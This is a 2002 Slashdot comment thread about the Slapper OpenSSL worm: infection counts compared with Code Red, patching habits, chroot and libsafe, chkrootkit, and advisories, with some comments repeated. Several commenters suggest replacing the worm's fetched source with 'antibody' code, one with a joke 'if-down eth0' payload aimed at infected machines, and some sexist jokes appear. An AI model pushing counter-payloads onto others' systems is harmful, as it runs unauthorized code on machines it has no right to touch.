being a good samaritan. no www prefix so browsers won't auto link it, no http prefix for same reason. please do not convert to hyperlink. digitalsushi.com/chkrootkit.tar.gz will leave up for 24 hours, or when i just cant take the abuse anymore.
-- slashdot: where everyone yells sarcastic metaphors to themselves to understand the issue
Interesting fun fact- almost 45% of you grabbing my mirror are using Windows:D (pssst. you can download from the lunix now, you don't have to download it with the Blue E and then WSFTP it up)
-- slashdot: where everyone yells sarcastic metaphors to themselves to understand the issue
To all those who will no doubt post "see, CodeRed can happen to Linux, too" - here is some enlightenment:
There are currently an estimated 10,000 hosts infected with Slapper (any variant).
According to DShield's CodeRed history page, around 25,000 windos hosts are still estimated as CodeRed infected, one year after the event. According to news.com, at the peak we had over 350,000 infected machines.
10,000 is about 2% of 350,000. No, Slapper is in not even comparable to CodeRed when it comes to spread, neither speed nor coverage.
It does, however, proof two things:
a) The Linux world is susceptible to the same generic diseases b) For various reasons (more variety, better sysadmins, better security in general), it coped much better with an actual outbreak.
It doesn't prove that much as there may be fewer Apache-SSL sites on linux than there are IIS sites. Code Red hit all IIS boxes, Slapper only hits Apache on linux, and even then, it requires the presence of gcc and some other conditions to be met before it works.
That said, I would like to see a more in-depth analysis of the proportions of machines which have been hit and are infected. Also, we should bear in mind that the impact is much less on linux as Apache normally runs as a non-root user while IIS almost always runs as a system/admin user.
It doesn't prove that much as there may be fewer Apache-SSL sites on linux than there are IIS sites. Code Red hit all IIS boxes, Slapper only hits Apache on linux, and even then, it requires the presence of gcc and some other conditions to be met before it works.
You say that like it's a bad thing.
But doesn't that speak to the resilience of the Open Source approach? The fact that you can run an Apache site without enabling or even installing SSL is a strength. AFAIK (and ICBW) you can't do that with IIS.
It shows that CodeReds growth was exponential at the critical time, which measured only a few hours. Days have passed since Slapper hit the 10k mark, and we haven't seen any considerably higher estimates.
Lets just hope Taco isn't doing too much sys admin work these days because this is really old news. Slapper was spotted over a week ago and the news appeared on LWN at the URL below.
My first log entry on my home box (DSL) showing this came up Sep 12... So almost 2 weeks ago.
The entry is as follows: [Thu Sep 12 17:40:09 2002] [error] [client 211.75.133.54] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23):/
I've had a total of about 45 hits in the last 2 weeks, not like nimda at all in that regard (had to nuke my error logs like twice a week instead of once a month).
BWP (BTW, I'm running FreeBSD and no SSL so it's not that big a deal for me.)
"Wget"ing its source
by
N+Monkey
·
· Score: 5, Interesting
From the article:
According to researchers at F-Secure, the Slapper.B worm variant is able to retrieve its source code from a Web page after the worm has been removed from infected servers. The worm uses a common free software utility, wget, to retrieve its source code from an infected Web page in the home.ro domain.
Administrators of the domain, which is located in Romania, have been notified and the infected page has been deleted from the site, according to F-Secure.
Rather than simply having deleted the page, I wonder if it would have possible to replace this source code with something else that acted as an "antibody"?
Re:"Wget"ing its source
by
bytesmythe
·
· Score: 3, Funny
For maximum benefit, the code should be something like:
if-down eth0
-- bytesmythe Hypocrisy is the resin that holds the plywood of society together. -- Scott Meyer
New Mac Users Should Take Note, Too
by
Spencerian
·
· Score: 2
For the newbies, remember that Mac OS X is a UNIX family member, too, and comes with Apache as well. The Mac world is used to getting only one or two attacks over a year that it could be easy to skip over this one.
Thankfully, Apple thought about their security model, so Mac OS X ships with Apache (known in its System Preferences as Personal Web Sharing) and many other common access features switched off by default.
Switching Personal Web Sharing on can make your Mac just as vulnerable to some, if not all of the effects of this worm (if this or any other worm contains x86-specific code for its payload, little to no effect may occur).
Apple's already addressed these vunerabilities in their recent Security Updates. You can install them from the Software Update system preference or download them from Apple.
-- Vos teneo officium eram periculosus ut vos recipero is.
A false sense of security
by
abhikhurana
·
· Score: 4, Interesting
I think that linux provides the sys admins with a false sense of security. Most sysadmins think that because running Linux, they can't be infected with any viruses and worms. The result of this is that many of hese adminstarators never bother to check about new threats, because they haven't seen anything like this for a while. Normally linux adminstrators are more tech savy than Windows adminstrators but as linx GUI improves, one will see a prliferation of not so tech savy adminstrators in the Linux market as well.So be prepared for increasing amounts of damage which such worms can cause. On the other hand, the adminstrators of Windows machines, because they are facing a new worm every second day, try to stay uptodate with the latest news and patches. Most of them have aautomatic update wizards running on their machines which download new patches instantly. Infact I would prefer such an instant update wizard for Linux as well, especially for the Linux running security critical applications, so that even if the system adminstrator is too lazy to check a news site, he will still come to know abot the threat. And because it will be running on linux, it will do what its supposed to do, not "God knows What and Gates knows what" as is the case with windows update wizard.
Re:A false sense of security
by
Winterblink
·
· Score: 3, Insightful
You know, I'm with you on this one. I know of friends who decided to jump on the Linux bandwagon, installed the OS and associated daemons and programs, had a fun time customizing their desktop, etc. Never put a single shred of time and effort into looking into any aspects of security. Asking them, the response was, nine times out of ten, "It's Linux man. Security out of the box." or something to that effect. These same people, myself included, when installing Windows head straight to the Control Panel and start deactivating nonessential services as one of the first steps. Subsequently, virus scanners, firewall software (ZoneAlarm, whatever), etc. Hell even my father hits WindowsUpdate and Norton LiveUpdate like it's a religion or something.
Good post man.
-- "I'm a leaf on the wind. Watch how I soar."
-Hoban Washburn
Re:A false sense of security
by
sparkz
·
· Score: 2
For Windows Update to work, everything must be installed where MS expects it - if you moved IE to C:\Your Programs\Internet Exploiter\ then Windows Update wouldn't get it.
Similarly, for such a Linux tool to work, it would require that everything is installed in a particular, predictable way; this is how apt_get et. al work.
If you've installed Apache SSL into/usr/webserver/secure/featherything/indian/apache- with-modssl/ then no automatic update facility has a chance of finding it...
The exploit is well known and people are aware of it. It's the same thing that Slapper.A and Slapper.B used.
Also, while the article makes much of "thousands" of servers compromised, it ignores the fact that the number of compromised servers is (at least last I saw) in the five digits, and pretty much leveled off to very few new infections.
Similar Windows worms (like Code Red) infected hundreds of thousands of machines, and took much longer to level off. Yes, there are still a lot of computers out there, but UNIX admins are a lot more on top of their machines than Win admins, by these numbers.
sysadmins?
by
Shadestalker
·
· Score: 4, Insightful
Lots of comments here mention that sysadmins are to be faulted for the spread of this worm. I wonder how many of the infected systems were in fact installed by part-timers who then walked away, or are just being run by newer linux users.
Keep watching, you'll see more of this as linux becomes even easier to install and use. Joe User likes it because it's easy to install and comes with lots of services he can run right out of the box. Joe User doesn't do sysadmin work, what do you mean it doesn't update itself?
Automatic update utilities need to keep pace with the ease of use and hands-off administration that people generally apply to a desktop OS like Windows, otherwise we're basically handing all these new users a gun that's already pointed at their heads.
Comment removed
by
account_deleted
·
· Score: 4, Interesting
It has been brought to our attention that several posters on this thread have implied that this viral outbreak is in some way connected to the open source community and their users. Slashdot wishes to reitterate their dogmatic belief:
Virus:= Bad
OpenSource:= Good
Microsoft:= Bad
Thus proving that any suggestion of a bug/vulnerability in Linux/Apache is a figment of a deluded imagination and you're most likely Welsh.
He said that operating systems will inherently have security holes.
I wonder if he meant that operating systems will inherently have remote security holes? I'm not so sure that's true, if you're using few servers, simpler ones, and ones not written in C.
Time to chroot apache
by
Icy
·
· Score: 2, Informative
I don't know why more people don't chroot apache or patch to use chroot(2). It can be a pain at times, but it can't be worse then having to reformat and reinstall the entire os because your are not sure what was tampered with. I know chroot is not perfect and you can break out of it, but as long as you are carefull about what goes in it, you are relatively safe. It would at least keep rootkits away from gcc, which seems to be required for most of these rootkits.
From: Ron DuFresne [mailto:dufresne@winternet.com] Sent: Tuesday, September 24, 2002 9:54 AM To: firewalls@isc.org Subject: Slapper worm redux;
Those folks relying upon security through obscurity might well wish to get on the ball and fully patch-up;
September 23 VNUNET.COM. A suspect has been arrested on suspicion of authoring the Slapper worm. But although the threat of the worm seems to have been short-lived, a new variant is already set to take up where its predecessor left off. Although the ISC's 'most attacked ports' chart no longer features Slapper in its Top 10 a variant, Slapper.B, has been spotted in the wild. Slapper.B has several subtle differences, but is for the most part an updated version of its predecessor. Both worms attempt to exploit a known vulnerability in the Secure Sockets Layer 2.0 (SSLv2) handshake process. The two variants also carry the same payload, a password-protected backdoor and denial of service (DoS) capabilities. ISS's Morgan said that with the new variant on the loose his company had calculated that about 10,000 servers were probably now infected, and that the network was probably going to be used for DoS attacks. He added that it was unlikely the original author created the second worm. "It was significant that source code for the original Slapper was distributed within the computer underground immediately after the worm was detected in the wild," he said. Source: http://www.vnunet.com/News/1135274
-- "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***
No, you are actually wrong on that. If you compare the number of IIS servers (they're all windos) and the number of Apache/Linux servers, then Apache/Linux is up front. Even if you double the number to account for people running IIS on their home-desktop, you get nowhere near the "infected-to-unaffected" ratio.
Remember that all the "95% market share" babble is about desktop systems, while both Slapper and CodeRed are targetting server systems, where windos is one among many, and by far not the leader.
Ah, but it's not an Apache exploit, but an SSLv2 exploit, no? Not every server running Apache is going to be running the SSL stuff as well. So suddenly, it's a bit smaller pool of boxes, and the 'installed base' thing comes back into prominence.
-- Vintage computer games and RPG books available. Email me if you're interested.
Good point, and true. However, the difference is not an order of magnitude, and as such doesn't matter much. If Slapper has 2% or 5% of the CodeRed impact is not an issue. If it had 20% instead of 2%, it would.
You can find figures on SSL servers at netcraft, unfortunately only if you pay for their SSL report.
Slappers.
by
burbledrone
·
· Score: 4, Informative
A linguistic note for Americans and other aliens....
"Slapper" is an EnglishEnglish term for a woman with an easily exploited hole....
On Onions and Carrots
by
Ektanoor
·
· Score: 4, Insightful
Some have been claiming around here that slapper is a "demonstration" that Linux is no better than Windows, maybe worse... Sorry you people but this talk is just about onions and carrots. The fact is that a very similar attack, that happens nearly a year after CodeRed/Nimda carmageddon, shows a huge difference between both worlds.
If anyone takes the care to look at incidents.org site, one may see the facts for himself. Slapper didn't hit the stands. It is far from its Windows cousins, not only in terms of infected machines but also in attacks. And note specially the attacks. In less than 12 hours after Nimda's appearence I had more then 340000 Nimda "visits" on the network I surpervised. On what concerns Slapper, till now things are nearly on zero. Slapper is in no way a second Nimda.
Retarded:A few hopes...
by
aphor
·
· Score: 3, Insightful
Let me explain the process. You tell me if the analogy fits.
robber:
You have a serious bug that can compromise a lot of running systems.
OpenSSL:
Oh really?
robber:
I'm serious. Here's how to exploit it, and here's a patch. I demand you fix it.
OpenSSL:
Let me have a look at that... We promise we'll fix it.
robber:
Well, I found it on accident, but it only took me a few hours to write the exploit and the patch. It shouldn't take more than a day or so to get the fix out.
OpenSSL:
We will update our code and send out a patch notice, but it's up to the users to upgrade on their own...
robber:
To give your notice some teeth, I'm going to post the worm to Usenet in 30 days if nobody beats me to it.
{look of utter fear from the thought that someone would say something like that and be serious.}
-- ~ kjrose
Slapper: The threat that wasn't?
by
Andy+Dodd
·
· Score: 2, Insightful
Yes, I'm going to be joining in the crowds of the "Windows still sucks despite this". And here's my reason why:
Simply put, as one person commented, a default Linux installation usually defaults to almost all services being turned OFF, whereas many Windows installations default to vulnerable services being ON.
As a result, the percentage of Linux servers that are actually intended to be servers is FAR greater than the percentage of Windows machines with IIS running that someone is actively maintaining.
As a result, more systems get patched sooner.
For a little dose of reality about Slapper: A friend of mine installed a honeypot on his network, waiting for a Slapper hit so he could check out this new, oh-so-uber threat to our wonderful Linux.
After a few days (might've been as long as a week), Slapper finally hit his machine.
Guess what else hit his machine? Code Red, a year-old Windows worm that made headlines *well over a year ago*, a minimum of 12 CR hits per DAY.
Now, given the Netcraft statistics where Apache has 40-50% of the marketshare of web servers on the 'net - Shouldn't Slapper be hitting more often than Code Red?
But it isn't, because Linux installations are more secure out-of-the-box, and are NOT vulnerable out of the box. One of the main reasons so many Windows machines aren't having IIS patches applied is because the user doesn't even know that IIS is running!
-- retrorocket.o not found, launch anyway?
Re:The most important thing to point out is ...
by
stinky+wizzleteats
·
· Score: 2
Having a patch in a few hours isnt all that impressive - its nice, but in effect - its not that useful.
I suppose it's more useful to be subject to the delays of what the commercial sfw industry calls "accepted vulnerability reporting practices" - which means we'll let you and your systems remain vulnerable for months while we:
Do a cost benefit analysis to derive the date at which it is more expensive to us to allow the problem to remain unpatched than to fix it.
Forward the results of the above analysis a schedule for the patch devel group so they can work on a patch.
Coordinate with other devel groups, legal, and marketing to determine what competitive inhibition (breaking Netscape, Novell, Samba, etc.), new DRM measures, EULA changes, and other related stuff should be released with the patch.
people are wary of installing untested patches
I have all of my Linux systems on automatic update, and I've never once had a problem with a patch. I've also never had to accept a new EULA, never had icons I'd previously deleted return to my desktop, nor had third party software suddenly fail to work following a system update.
The difference is not so clear
by
FallLine
·
· Score: 2
Tell me precisely what the difference is, in reality, between the so-called white hats that publish exploit code that allows script kiddies across the world to execute arbitrary code (w/o any modification) on remote machines and the so-called black hat that does the same thing only does not require the same number of script kiddies (because it is self-perpetuating)? Neither necessarily use or commence the attack themselves, but they enable thousands of machines to be hacked just the same. Maybe you can argue that proof of the concept does not require self-perpetuation or the installation of a backdoor (as in the case of the worm), but nor does it require the execution of code that is desirable to the script kiddy (as in the case of many so-called white hat advisories)
I think the idea is that the slapper worm will try to grab something from server X (which it believes to be infected) and it tries to run that. If I replaced what it was expecting with something else, that can't be my fault - an external entity was grabbing code off my servers and executing it, not me.
Re:Slapper: The threat that wasn't?
by
Dionysus
·
· Score: 2, Informative
Not all Apache servers run on Linux. Not all Linux systems run Apache. Not all Linux/w Apache has mod_ssl.
-- Je ne parle pas francais.
If you're an admin...
by
otis+wildflower
·
· Score: 2, Insightful
... and you haven't already patched this months-old hole, hand in your resignation now. There's lots of folks more competent than you who need work.
Re:Source Code?
by
whovian
·
· Score: 3, Informative
one might write a wee proggie to sit on UDP port 2002,
Not good enough, I don't think.
I'm seeing remote ports 2140:2144 being used to attempt to connect to port 443.
So, I'm denying port 443 incoming and monitoring all outgoing unaccounted for udp. (Yes, we were infected.)
-- To-do List: Receive telemarketing call during a tornado warning. Check.
Watch for trojans! Use your own binaries!
by
Wee
·
· Score: 3, Informative
Since chkrootkit normally uses lots of stuff that usually lives in/bin (strings, ps, ls, find, etc), make extra sure that you use the '-p <directory>' flag when you run it. That tells chkrootkit to look for the binaries it needs in directory instead of wherever they are found in your path. Before you can do this, however, you need to (from a fresh, known-to-be-clean install) either copy all the needed binaries to a CD-R or to a partition re-mounted as read-only. A real paranoid would re-compile static versions of those utils and then use those. YMMV.
It does very little good to check for a rootkit when all the good GNU stuff in/bin has been trojaned...
-B
--
Ash and Hickory, straight-grained and true, make excellent bludgeons, dandy for the cudgeling of vegetarians.
The job of the sysadmin is to stay on top of what is being revealed as vulnerable and then to act appropriately so as to mitigate risk. Updating packages automatically isn't doing that - what if the repository that apt is hitting has been compromised? What if the new version of package X has other issues that make it less than optimal?
One does not approach being secure by putting one's faith in some tool and hoping it solves everything. The only way to lock down a box is to be vigilant and aware, in my experience.
The problem isn't not having packages automatically updated, but rather that there are sysadmins who are militantly unaware of disclosed vulnerabilities in the software they run. Solve the latter and you don't need the (somewhat short-sighted) former.
-- We who were living are now dying
With a little patience
Every time I hear about anohter buffer overflow, I scratch my head and ask, "Why doesn't anybody use libsafe? This is a library which, once installed, protects all processes, regardless whether they have been patched or not.
It transparently replaces the libc functions that are the usual targets of stack smashing attacks, and checks whether the stack frame has been overrun. If the stack has been smashed, the process gets terminated forcefully, and root (or other designated contact) gets an e-mail with all the details.
This has been out for several years now, and I am amazed that no major distribution includes this in a standard server install.
-Steve
-- Hey, Windows users, there is no such thing as "forward" slash, there is only slash and backslash.
Electric Fence in linux (or any other unix platform) will do this for you. It will segfault on any references beyond the end of malloc'ed arrays, use of free()'d memory, etc.
Its very easy to use too -- just link with -lefence or set $LD_PRELOAD to load it.
With it being out for so many years, its a wonder that people don't make it standard practice to use it!
I'd be interested to see what kind of overhead this checking adds to a server. I'll agree that a slow, secure server is better than a fast, unsecure server, but if it is too slow...
Also, I wonder how well this scales up to the enterprise. It may work well for several processes on a single box, but what happens when you distribute those processes to back-end servers. Each box on its own may be fine, but when they intercommunicate, problems could arise.
-- I'd rather you do it wrong, than for me to have to do it at all.
Think Pinto
by
Slipped_Disk
·
· Score: 2, Interesting
For those of you who don't recall, the Pinto was a car with a minor flaw - If you bumped into its ass it tended to explode in a fireball. Ford new of the problem, and even had a "patch" to fix it (minor design change adding some shielding around the tank if I recall). They chose not to fix the problem because of economics.
The same principle applies to large companies and security patches - If there's no exploit and we don't tell anyone the problem exists, maybe we can get away without investing the time/money (programmers are expen$ive!) in fixing it. Much like Ford, they are gambling that the losses due to the bug/hole/whatever won't be significant enough to hurt their profits long-term.
Software is a business, like any other, and businesses tend to make stupid decisions when they see a way to save a few pennies. They may be wrong (VERY VERY WRONG), but until EVERYONE makes it clear that the "patch it when it gets exploited" mentality hurts their business, the companies will continue doing as they have done.
-- /~mikeg
Re:Slapper: The threat that wasn't?
by
Winterblink
·
· Score: 2
All you've served to point out is that, no matter what platform you choose to run, you should still be diligent in maintaining the security of the system.
No matter how secure Linux claims to be, people should take the perception of default installs being invulnerable out of the box with a huge grain of salt, and give it a good look for anything they can turn off or plug up. The same goes for Windows users, ESPECIALLY for them in my opinion.:) If anything this whole Slapper issue should serve to educate both sides of the Windows vs. Linux debate that security problems exist for everyone no matter what you run.
-- "I'm a leaf on the wind. Watch how I soar."
-Hoban Washburn
It's NOT a Linux Worm
by
sjvn
·
· Score: 2, Informative
And, it's not an Apache worm either. It's an OpenSSL worm that exploits security holes in OpenSSL 0.9.6f and earlier.
While the current generation of Slapper targets only OpenSSL on Linux, it will try its attack on any system. And, with a little code tweaking, the next generation of Slapper could hammer on any OS that uses older versions of OpenSSL such as AIX, Solaris, Windows. In short, pretty much any OS that uses OpenSSL is potentially a victim.
Could you have it? If you're a Unix/Linux admin, use chkroot version 0.37 and up to find out. It's available at:
http://www.chkrootkit.org/
In any case, anyone who uses OpenSSL should update with OpenSSL 0.9.6g or higher ASAP. And, while you're at, be certain to relink everything since OpenSSL isn't used just by Apache. ISC, for example, used it in their BIND 9.1. Slapper wouldn't hit BIND, but would you care to bet that someone couldn't modify the code to launch a BIND attack--and aren't we all really, really sick of BIND getting bungled?
For more on Slapper, and a listing of patches for many operating systems see:
Slapper: The FUD and the Danger http://www.practical-tech.com/network/n091 82002.ht m
Finally, most of these patches, which would have stopped Slapper dead, were available in late July/early August. Consider it more proof that security is a full time system administrator job.
Steven
All togehter now: Defense In Depth.
by
CrystalFalcon
·
· Score: 2
While you're right in part about the importance to secure a system, you miss out completely on the importance on defense in depth.
The worst flaw of them all about any security, not just information security, is depending on any one process or action or filter to take care of all attacks. It Won't Work. It Will Fail and when it does, you're hosed. The more defenses in depth you have deployed, the better off you are.
Let me illustrate some of the key design criteria for a modern-day tank (as in main battle tank) to illustrate:
1) Avoid detection.
2) If detected, avoid getting hit.
3) If hit, avoid penetration.
4) If penetrated, minimize damage to equipment and crew.
See what I mean? You have to consider what happens if your defenses fail, and where you would be the most vulnerable, and take additional steps there. Because, you know what? Your defenses will fail. But the more of them you have, the less damage an attacker will be able to do by bringing one down.
(One software company I used to work for would take this to extremes and code X-Files style; "Always assume that the entire world around you has been compromised, that your code is the last piece of code standing! Every data you get, even from within the system, is from somebody who's feeding you bogus or random data, or even lying on purpose to make you fail." But the resulting software had defense in depth.)
What Causes These Flaws?
by
RAMMS+EIN
·
· Score: 2
Anybody else have the idea that many vulnerabilities are partially due to deficiencies of the programming language used? For example, I believe that C's cumbersome string handling is a major cause of buffer-overrun vulnerabilities. Of course, buffer-overruns and off-by-one errors are programming errors, but I think their frequency at the very least lends legitimacy to programming languages designed to avoid such errors.
As for stack-smashing: I think stack shouldn't be executable anyway. Since Intel has given us data segments that aren't executable and code segments that aren't writable, at least x86 systems could be invulnerable to these attacks. Well, causing a segmentation fault would still lead to DoS I guess, but at least it wouldn't allow arbitrary code to be executed, which would also prevent worms from spreading. And if the segmentation fault would only terminate the thread that is being attacked, rahter than the whole server, it even DoS wouldn't be possible anymore - except through flooding, but that's a different story.
Summing up, I think there is reason to reconsider the lower-level components of our systems. Programming errors could to a large extend be avoided by using a language that doesn't allow them, and implementing a more rigid security system at memory manager level could stop certain exploits from working.
-- Please correct me if I got my facts wrong.
Also check your /tmp directory
by
Mr.+Flibble
·
· Score: 2
I have seen variant A and B on my network (I admin about 200 machines, but unfortunately the customers themselves, not I are in charge of patching their systems. I only go in and fix it when the customers realize something is wrong. Sort of a "meta-admin" if you will.)
I have not seen variant C, which I believe uses port 1978. Once the worm hit we blocked all the ports it uses at the router. This mitigated much of the damage, even though the exploit comes in on port 443.
HOWEVER be aware I have seen some attempted backdoor exploits that were not worm based. That is, an apache shell was obtained and someone was in on the system installing extra software and attempting to escalate privliages and crack the root account.
This is far more serious than the worm by itself. Fortunately, all I have seen so far is skript kiddies attempting to install backdoors that don't work because they do not have a rootshell. These backdoors were clearly not part of the regular worm. So other exploits than just the worm itself are out there.
Fortunately this worm is waking my customers up, and the systems are getting patched. (It does not matter how many times I run nessus, and send the customer a report saying "fix this", when I send them a message saying "you have now been hit" they suddenly spring into action, or get me to fix it. Funny how that works.)
Information and live status about the worm
by
randomErr
·
· Score: 2
Hey all,
Ero Carrera at F-Secure.com asked that I post this for them: "Information and live status about the worm can be found at http://www.f-secure.com/slapper/"
Inner Monologue I wonder if Ero is a guy or a chick? And if it's chick is she like looking, ya know what I mean?
-- You say things that offend me and I can deal with it. Can you?
This proves the Brits were behind slapper. And since the PATRIOT Act allows us to define propagating computer worms as an act of terrorism, I vote that the Bush Administration does what we should have done a long time ago:
Slashdot Mirror
... we're starting to catch up with Microsoft in the vital worm-propagation field, where they've been unmatched for years. :-)
Laugh, it's a joke
- sig? who is this sig of which you speak?
1. That most system admins out there are bright enough to keep their machines up to date with the latest patches.
;)
2. Whoever is writing these worms knows how much damage they're doing to open source. It would have been preferrable to inform the OpenSSL people first, wait a month, then release the worm.
Of course, by the time you read this, the bug will have been patched.
Why bother.
You think this is tied to the popularity increas of Linux in the userbase? The webservers have always been around...
;)
Seems like the golves are coming off. Perhaps we need a sample of this worm to test its DNA and determine its origins
http://www.chkrootkit.org/
version 0.37 has been updated to find the slapper - JB
The heat from below can burn your eyes out
I'd say that this looks more like an Apache worm than a Linux worm. It does not seem too bad though, "Get your Apache systems patched and update your antivirus software and you should be fine." (from the Slapper.C article).
This shows that Linux+Apache is so widely accepted that it is a legitimate virus target. Enjoy it!
I wonder how Windows must look then. Yikes!
-- Jim
1) Don't enable services and features you don't need (or in MS sysadmin speak--DISABLE all of the services and features you don't need that have "helpfully" been activated in the base install); and
2) Keep up to date on your patch levels.
You don't have to be bleeding-edge on patches, but when a security vulnerability with malicious code in the wild has been detected, it's time to *DO* something about it!
Really, I wonder how many of these infected websites were actually USING SSL, as opposed to having that port hot but unused...
I find it terribly amusing how for years the open-source community has used the larger number of holes found in Windows systems as one of their arguments against it. Yet now when the open-source community is also plagued with the same thing the comments tend to be along the line of 'Windows still sux.' and 'Do you know how much you're hurting the open-source movement? Please stop.'
Seems to me like older anti-MS comments are coming around and biting people in the ass.
According to researchers at F-Secure, the Slapper.B worm variant is able to retrieve its source code from a Web page after the worm has been removed from infected servers. The worm uses a common free software utility, wget, to retrieve its source code from an infected Web page in the home.ro domain.
Administrators of the domain, which is located in Romania, have been notified and the infected page has been deleted from the site, according to F-Secure.
They should have replaced the code for the worm with code that pops up a window that says "Patch your server, you halfwit!"
Maybe the state's highest function is to grind out insoluble problems. (Zelazny, Hall of Mirrors)
I think you're being *way* too paranoid.
What do you think are the chances Microsoft employees are contributing buggy patches to key open source projects, causing buffer overruns and worms?
Almost nil.
Even if they are, the maintainers share the blame for not reviewing them properly.
http://www.cert.org/advisories/CA-2002-27.html
A bank robbery is a different type of intrusion. You cannot threaten a computer to give you access. An armed bank robbery is a failure of humans, not security systems. I'm sure all the cameras and locking mechanisms on doors and vaults at a bank work just fine in an armed robbery. The humans unlock them out of self-preservation and the mechanisms do exactly what they are requested.
Exploiting a vulnerability like this is similar to walking down the ally behind the bank and finding an unlocked door that takes you straight into the vault. Some people (other politics aside such as "who would want to help such a stupid bank!?") would inform the bank, hoping to increase it's security. Typically in open source, when we find unlocked doors, we tell the maintainers as soon as possible. It's peer review.
I am not suggesting we do not release exploits though. Worms like this are a good practice run (and a great way of informing the sysadmins they need updates). *shrug*
Why bother.
What should I look for in my apache logs to see if Im being "hit" by it? Anyone have an example?
your friendly neighborhood AC
IMHO if you need SSL on a webserver, you should be forced to go through the download + build + cert process yourself.
If you were like me and wondered if after the OpenSSL upgrade that you actually patched everything right, you can compile and run this program to find out:
- ss lv2-master/openssl-sslv2-master.c
http://cert.uni-stuttgart.de/advisories/openssl
It will connect to your HTTPS server and check it. Unfortunatly, it won't connect to SSH. It helped me make sure I was patched up at least for apache.
And I have never quite understood why the advisory says to recompile your apps as well. If they are using the Shared Library, where the problem actually exists, then they get the upgrade by default. Now, if you had some static compiles, then sure.
Pbur
Usualy it takes at least half of hour to release patch when hole is discovered.
This time patch was month or so too fast for Slapper.B and C. Does this mean that Open Source gets better and better?
p.s. I hate lame unintuitive virus writers without imagination
Signature Pro version 1.13.2-3 release 83.5 beta3try7 after-breakfast edition
Code Red infected at least 400,000 Microsoft systems. I think it infected 40,000 in the first day. Nimda got something like 65,000 plus. Slapper has infected 7,000 to 11,000, depending upon who you listen to. Now take into consideration that Linux Apache systems host a significantly larger number of web sites than Windows systems do.
Slapper is a minor event. I see a constant stream of Microsoft security alerts go through my mailbox, and you don't hear a peep out of these Microsoft apologists and cheerleaders until a serious Open Source vulnerability occurs once or twice a year.
All complex software will have bugs. It seems to me that Open Source bugs get fixed quicker, and Open Source admins are more inclined to patch in a timely manner than Microsoft ones by at least one order of magnitude. What do you expect from Windows, though, when its target market is people who don't know how to use computers.
> I find it terribly amusing how for years the open-source community has used the larger number of holes found in Windows systems as one of their arguments against it. Yet now when the open-source community is also plagued with the same thing the comments tend to be along the line of 'Windows still sux.'...
Sheesh, evil *and* a jerk. -- Jade
being a good samaritan. no www prefix so browsers won't auto link it, no http prefix for same reason. please do not convert to hyperlink. digitalsushi.com/chkrootkit.tar.gz will leave up for 24 hours, or when i just cant take the abuse anymore.
slashdot: where everyone yells sarcastic metaphors to themselves to understand the issue
To all those who will no doubt post "see, CodeRed can happen to Linux, too" - here is some enlightenment:
There are currently an estimated 10,000 hosts infected with Slapper (any variant).
According to DShield's CodeRed history page, around 25,000 windos hosts are still estimated as CodeRed infected, one year after the event.
According to news.com, at the peak we had over 350,000 infected machines.
10,000 is about 2% of 350,000. No, Slapper is in not even comparable to CodeRed when it comes to spread, neither speed nor coverage.
It does, however, proof two things:
a) The Linux world is susceptible to the same generic diseases
b) For various reasons (more variety, better sysadmins, better security in general), it coped much better with an actual outbreak.
Assorted stuff I do sometimes: Lemuria.org
Lets just hope Taco isn't doing too much sys admin work these days because this is really old news. Slapper was spotted over a week ago and the news appeared on LWN at the URL below.
http://www.lwn.net/Articles/10026/
Thanks.
Rather than simply having deleted the page, I wonder if it would have possible to replace this source code with something else that acted as an "antibody"?
For the newbies, remember that Mac OS X is a UNIX family member, too, and comes with Apache as well. The Mac world is used to getting only one or two attacks over a year that it could be easy to skip over this one.
Thankfully, Apple thought about their security model, so Mac OS X ships with Apache (known in its System Preferences as Personal Web Sharing) and many other common access features switched off by default.
Switching Personal Web Sharing on can make your Mac just as vulnerable to some, if not all of the effects of this worm (if this or any other worm contains x86-specific code for its payload, little to no effect may occur).
Apple's already addressed these vunerabilities in their recent Security Updates. You can install them from the Software Update system preference or download them from Apple.
Vos teneo officium eram periculosus ut vos recipero is.
I think that linux provides the sys admins with a false sense of security. Most sysadmins think that because running Linux, they can't be infected with any viruses and worms. The result of this is that many of hese adminstarators never bother to check about new threats, because they haven't seen anything like this for a while. Normally linux adminstrators are more tech savy than Windows adminstrators but as linx GUI improves, one will see a prliferation of not so tech savy adminstrators in the Linux market as well.So be prepared for increasing amounts of damage which such worms can cause.
On the other hand, the adminstrators of Windows machines, because they are facing a new worm every second day, try to stay uptodate with the latest news and patches. Most of them have aautomatic update wizards running on their machines which download new patches instantly.
Infact I would prefer such an instant update wizard for Linux as well, especially for the Linux running security critical applications, so that even if the system adminstrator is too lazy to check a news site, he will still come to know abot the threat.
And because it will be running on linux, it will do what its supposed to do, not "God knows What and Gates knows what" as is the case with windows update wizard.
What's under yellowstone?
The exploit is well known and people are aware of it. It's the same thing that Slapper.A and Slapper.B used.
Also, while the article makes much of "thousands" of servers compromised, it ignores the fact that the number of compromised servers is (at least last I saw) in the five digits, and pretty much leveled off to very few new infections.
Similar Windows worms (like Code Red) infected hundreds of thousands of machines, and took much longer to level off. Yes, there are still a lot of computers out there, but UNIX admins are a lot more on top of their machines than Win admins, by these numbers.
May we never see th
Lots of comments here mention that sysadmins are to be faulted for the spread of this worm. I wonder how many of the infected systems were in fact installed by part-timers who then walked away, or are just being run by newer linux users.
Keep watching, you'll see more of this as linux becomes even easier to install and use. Joe User likes it because it's easy to install and comes with lots of services he can run right out of the box. Joe User doesn't do sysadmin work, what do you mean it doesn't update itself?
Automatic update utilities need to keep pace with the ease of use and hands-off administration that people generally apply to a desktop OS like Windows, otherwise we're basically handing all these new users a gun that's already pointed at their heads.
Comment removed based on user account deletion
Comment removed based on user account deletion
It has been brought to our attention that several posters on this thread have implied that this viral outbreak is in some way connected to the open source community and their users. Slashdot wishes to reitterate their dogmatic belief: Virus := Bad
OpenSource := Good
Microsoft := Bad
Thus proving that any suggestion of a bug/vulnerability in Linux/Apache is a figment of a deluded imagination and you're most likely Welsh.
And the patch fixes the hole that all variants use.
May we never see th
Comment removed based on user account deletion
He said that operating systems will inherently have security holes.
I wonder if he meant that operating systems will inherently have remote security holes? I'm not so sure that's true, if you're using few servers, simpler ones, and ones not written in C.
May we never see th
